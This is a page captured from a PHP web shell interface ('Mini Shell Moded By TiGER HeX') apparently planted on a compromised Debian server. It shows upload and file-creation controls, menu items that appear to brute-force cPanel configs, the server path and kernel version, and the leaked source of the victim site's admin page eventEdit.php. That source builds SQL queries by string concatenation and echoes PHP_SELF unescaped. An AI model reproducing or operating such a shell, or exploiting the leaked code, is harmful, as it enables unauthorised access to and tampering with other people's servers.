Mini Shell Moded By TiGER HeX
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
var
/
www
/
ridazz
/
admin
/
Linux midnightridazz 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
Upload File :
New :
File
Dir
//var/www/ridazz/admin/eventEdit.php
<? include_once('../includes/static/configure.php'); include_once('../includes/static/util.php'); include_once('../includes/static/dbcon2.php'); include_once('../includes/static/gdimg.php'); include_once('../includes/static/sessions.php'); include_once('includes/static/util.php'); include_once('../includes/static/util.php'); include_once('includes/appTop2.php'); $page_id = str_replace(".php","",basename($_SERVER['PHP_SELF'])); if(!has_permission($page_id)){ die("You don't have permission to view this page!"); } $html=""; $uid = 0; if(isset($_SESSION['admin_id'])){ $uid = isNum($_SESSION['admin_id'], 0); }elseif(isset($_SESSION['editor_id'])){ $uid = isNum($_SESSION['editor_id'], 0); } $story_id = 0; if(isset($_REQUEST['storyId'])){ $story_id = isNum($_REQUEST['storyId'], 0); } $action = ""; if(isset($_REQUEST['action'])){ $action = $_REQUEST['action']; } if($action == "removeImage"){ $embedId = $db->sanitize_input($_REQUEST['embedId']); $sql = "DELETE FROM 50mm_embed WHERE embed_id ='".$embedId."'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } } if(isset($_REQUEST['update'])){ //store text $story_title = $db->sanitize_input(sanitize_title($_REQUEST['title'])); $story_body = $db->sanitize_input(sanitize_body($_REQUEST['body'])); $date=sanitize_date($_REQUEST['year']."-".$_REQUEST['month']."-".$_REQUEST['day']); $sql = "UPDATE 50mm_stories SET story_title='$story_title',story_body='$story_body',entry_time='$date' WHERE story_id='$story_id'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } //store images for($i=1;$i<=count($_FILES);$i++){ $cur_file = $_FILES['file'.$i]['name']; $cur_temp = $_FILES['file'.$i]['tmp_name']; $cur_size = $_FILES['file'.$i]['size']; $cur_type = $_FILES['file'.$i]['type']; $cur_mime = $_FILES['file'.$i]['type']; $cur_error = $_FILES['file'.$i]['error']; if(!empty($cur_file)){ $valid = validate_content($cur_error,$cur_mime,$cur_size,$cur_file,EVENT_MAX_KB); if($valid['result']){ $type = explode("/",$cur_mime); $cur_type = trim($type[0]); $unique_name = $db->sanitize_input(get_unique_filename($cur_file)); $image_info = getimagesize($cur_temp); //create image resource $gd = new gd_img($cur_mime,$cur_temp); if(!$gd->img_id){ die($gd->gd_error);} //check to see if thumb image needs resizing if(($image_info[0] > EVENT_THUMB_WIDTH) || ($image_info[1] > EVENT_THUMB_HEIGHT)){ //resize $id_t = $gd->gd_scale_img(EVENT_THUMB_WIDTH,EVENT_THUMB_WIDTH,IMG_QUALITY); if(!$id_t){ die($gd->gd_error);} $res = $gd->gd_create_img($id_t,ROOT_DIR.STORY_SIMG_DIR.$unique_name); if(!$res){ die($gd->gd_error);} }else{ //don't resize $res = $gd->gd_create_img($gd->img_id,ROOT_DIR.STORY_SIMG_DIR.$unique_name); if(!$res){ die($gd->gd_error);} } //create watermark image $w_type = getimagesize(WATERMARK_FILE); $gdw = new gd_img($w_type['mime'],WATERMARK_FILE); if(!$gdw->img_id){ die($gdw->gd_error);} //check to see if full size image needs resizing if(($image_info[0] > EVENT_IMG_WIDTH) || ($image_info[1] > EVENT_IMG_HEIGHT)){ //scale image $id = $gd->gd_scale_img(EVENT_IMG_WIDTH,EVENT_IMG_WIDTH,IMG_QUALITY); if(!$id){ die($gd->gd_error);} //apply watermark $res = $gd->gd_merge_ids($id,$gdw->img_id); if(!$res){ die($gd->gd_error);} //create scaled image $res = $gd->gd_create_img($id,ROOT_DIR.STORY_LIMG_DIR.$unique_name); if(!$res){ die($gd->gd_error);} }else{ $id = $gd->img_id; //apply watermark $res = $gd->gd_merge_ids($id,$gdw->img_id); if(!$res){ die($gd->gd_error);} //create full image $res = $gd->gd_create_img($gd->img_id,ROOT_DIR.STORY_LIMG_DIR.$unique_name); if(!$res){ die($gd->gd_error);} } $sql = "INSERT INTO 50mm_embed (story_id,image) VALUES ('$story_id','$unique_name')"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } }else{ $html.="<div class=\"error\">Unable to store the following content $cur_file<br> Reason: ".$valid['error']."</div>"; } } } $html.= "<div class=\"hilite\">operation successful</div>"; } include_once('includes/header.php'); //get event info $html = ""; $sql="SELECT story_id, story_title, story_body, entry_time FROM 50mm_stories WHERE story_id = '$story_id' ORDER BY story_id DESC"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $row = $db->sql_fetchrow($result); $story_id = $row['story_id']; $story_title = $row['story_title']; $story_body = $row['story_body']; $day = substr($row['entry_time'],8,2); $month = substr($row['entry_time'],5,2); $year = substr($row['entry_time'],0,4); $sql = "SELECT image,embed_id FROM 50mm_embed WHERE story_id = '$story_id'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $modrows = Array(); while ($row = $db->sql_fetchrow($result)){ $embed_id = $row['embed_id']; if(is_file(ROOT_DIR.STORY_LIMG_DIR.$row['image'])){ $img_info = getimagesize(ROOT_DIR.STORY_LIMG_DIR.$row['image']); //width is greater so scale width if($img_info[0] > $img_info[1]){ $scale = round($img_info[0]/50); }else{ $scale = round($img_info[1]/50); } $w = $img_info[0]/$scale; $h = $img_info[1]/$scale; $js = "popImage('".urlencode(STORY_LIMG_DIR.$row['image'])."','".$img_info[0]."','".$img_info[1]."');"; $row['image'] = "<img src=\"".STORY_SIMG_DIR.$row['image']."\" border=\"0\" width=\"$w\" height=\"$h\" style=\"cursor:pointer;\" onClick=\"".$js."\">"; }else{ $row['image'] = "no image on disk"; } $xtras = Array( "remove"=>"<a href=\"".$_SERVER['PHP_SELF']."?storyId=$story_id&embedId=$embed_id&action=removeImage\">remove</a>" ); unset($row['embed_id']); $all = array_merge($row,$xtras); array_push($modrows, $all); } echo(get_table($modrows)); ?> <?echo $html?> <script>divs = new Array('title','body');</script> <form action="<?echo $_SERVER['PHP_SELF']?>" method="post" enctype="multipart/form-data" onSubmit="return validateForm(this,divs,'eventError');"> <table cellspacing="0" cellpadding="4" border="0"> <tr> <td>Title<span id="errtitle" class="error" style="visibility:hidden;"> *</span></td></td> <td><input type="text" name="title" value="<?echo $story_title?>" class="field" style="width: 200px;"></td> </tr> <tr> <td>Date</td> <td> <? $m_opt = '<select name="month">'."\n"; while (list($key, $txt) = each($month_array)) { if($key == $month){ $m_opt.= '<option value="'.$key.'" selected>'.$txt.'</option>'."\n"; }else{ $m_opt.= '<option value="'.$key.'">'.$txt.'</option>'."\n"; } } $m_opt.= '</select>'."\n"; echo $m_opt; ?> - <? $d_opt = '<select name="day">'."\n"; for($i=1;$i<=31;$i++){ if($i<=9){ $key = "0".$i; }else{ $key = $i; } if($key == $day){ $d_opt.= '<option value="'.$key.'" selected>'.$i.'</option>'."\n"; }else{ $d_opt.= '<option value="'.$key.'">'.$i.'</option>'."\n"; } } $d_opt.= '</select>'."\n"; echo $d_opt; ?> - <? $start_year = date('Y') - 2; $end_year = date('Y') + 2; $y_opt = '<select name="year">'."\n"; for($i=$start_year;$i<=$end_year;$i++){ if($i == $year){ $y_opt.= '<option value="'.$i.'" selected>'.$i.'</option>'."\n"; }else{ $y_opt.= '<option value="'.$i.'">'.$i.'</option>'."\n"; } } $y_opt.= '</select>'."\n"; echo $y_opt; ?> </td> </tr> <tr> <td>Upload Image(s)</td> <td> <? for($i=1;$i<=10;$i++){ echo "<input type=\"file\" name=\"file".$i."\" class=\"field\"><br>"; } ?> </td> </tr> <tr> <td>Body<span id="errbody" class="error" style="visibility:hidden;"> *</span></td> <td><textarea wrap="on" name="body" class="body" style="width: 2000px; height: 200px;"><?echo $story_body?></textarea></td> </tr> <tr> <td colspan="2" align="center"> <div align="left"> <input name="update" type="submit" class="button" value="Update Event"> <input name="storyId" type="hidden" value="<?echo $story_id?>"></div> <div id="eventError" class="error" style="visibility:hidden;">Please correct the fields marked by *</div> </td> </tr> </table> </form> <?echo $html;?> <br> <? include_once('includes/footer.php'); include_once('includes/appBottom.php'); ?>